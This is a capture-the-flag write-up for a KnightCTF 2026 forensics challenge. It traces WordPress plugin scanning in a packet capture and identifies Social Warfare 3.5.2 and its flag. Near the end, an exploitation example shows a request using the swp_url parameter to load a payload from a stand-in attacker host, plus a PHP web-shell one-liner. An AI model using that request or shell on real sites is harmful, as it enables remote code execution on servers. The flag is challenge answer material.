KnightCTF 2026 - Forensics: Vulnerability Exploitation
Challenge Information
- Category: Forensics
- File: pcap2.pcapng
Challenge Description
Using the same pcap file (pcap2.pcapng), find the vulnerable plugin name and version.
Flag Format: KCTF{plugin_name_version}
Solution
Step 1: Identify Plugin Scanning Activity
The attacker (192.168.1.104) was scanning for WordPress plugins. Searching for plugin readme.txt requests:
strings pcap2.pcapng | grep -i 'readme.txt' | sort -uFound targeted plugin scans:
HEAD /wordpress/wp-content/plugins/social-warfare/readme.txt HTTP/1.1GET /wordpress/wp-content/plugins/social-warfare/readme.txt HTTP/1.1HEAD /wordpress/wp-content/plugins/thim-blocks/readme.txt HTTP/1.1GET /wordpress/wp-content/plugins/thim-blocks/readme.txt HTTP/1.1Step 2: Extract Plugin Information
Exported HTTP objects from the pcap:
tshark -r pcap2.pcapng -Y 'http' --export-objects 'http,/tmp/http_export'Step 3: Analyze readme.txt Content
Read the exported readme.txt file to find plugin details:
cat /tmp/http_export/readme.txtContent revealed:
=== WordPress Social Sharing Plugin - Social Warfare ===Contributors: holas84, dustinwstout, webinator, warfareplugins...Tags: sharing buttons, social media share, floating share buttons...Requires at least: 4.5.0Tested up to: 5.1Stable tag: 3.5.2Requires PHP: 5.6Step 4: Vulnerability Identification
Social Warfare version 3.5.2 is vulnerable to CVE-2019-9978 - an Unauthenticated Remote Code Execution (RCE) vulnerability.
This vulnerability allows attackers to inject malicious payloads via the swp_url parameter, leading to arbitrary code execution on the server.
Affected Versions: < 3.5.3
Flag
KCTF{social_warfare_3.5.2}Vulnerability Details
CVE-2019-9978 - Social Warfare RCE
| Attribute | Value |
|---|---|
| Plugin | Social Warfare |
| Vulnerable Version | 3.5.2 (and below) |
| CVE | CVE-2019-9978 |
| Type | Unauthenticated RCE |
| CVSS Score | 9.8 (Critical) |
How the Attack Works
- Attacker scans for Social Warfare plugin presence via
readme.txt - Plugin confirmed with version 3.5.2 (vulnerable)
- Exploit uses
swp_urlparameter to load malicious payload - Payload executes arbitrary PHP code on the server
Exploitation Example
GET /wordpress/?swp_url=http://attacker.com/payload.txtWhere payload.txt contains:
<pre>system($_GET['cmd'])</pre>Attack Timeline from PCAP
- Directory Bruteforce - Attacker scanned thousands of paths
- Plugin Enumeration - Checked for various vulnerable plugins
- timthumb Scanning - Searched for timthumb.php vulnerabilities
- Social Warfare Discovery - Found and identified vulnerable plugin
- User Enumeration - Used wp-json API to find admin user
- Login Attempt - Tried credentials against wp-login.php
Tools Used
- tshark (HTTP object export)
- strings
- grep
- Wireshark
References
Author: MR. Umair
Date: January 20, 2026
Competition: KnightCTF 2026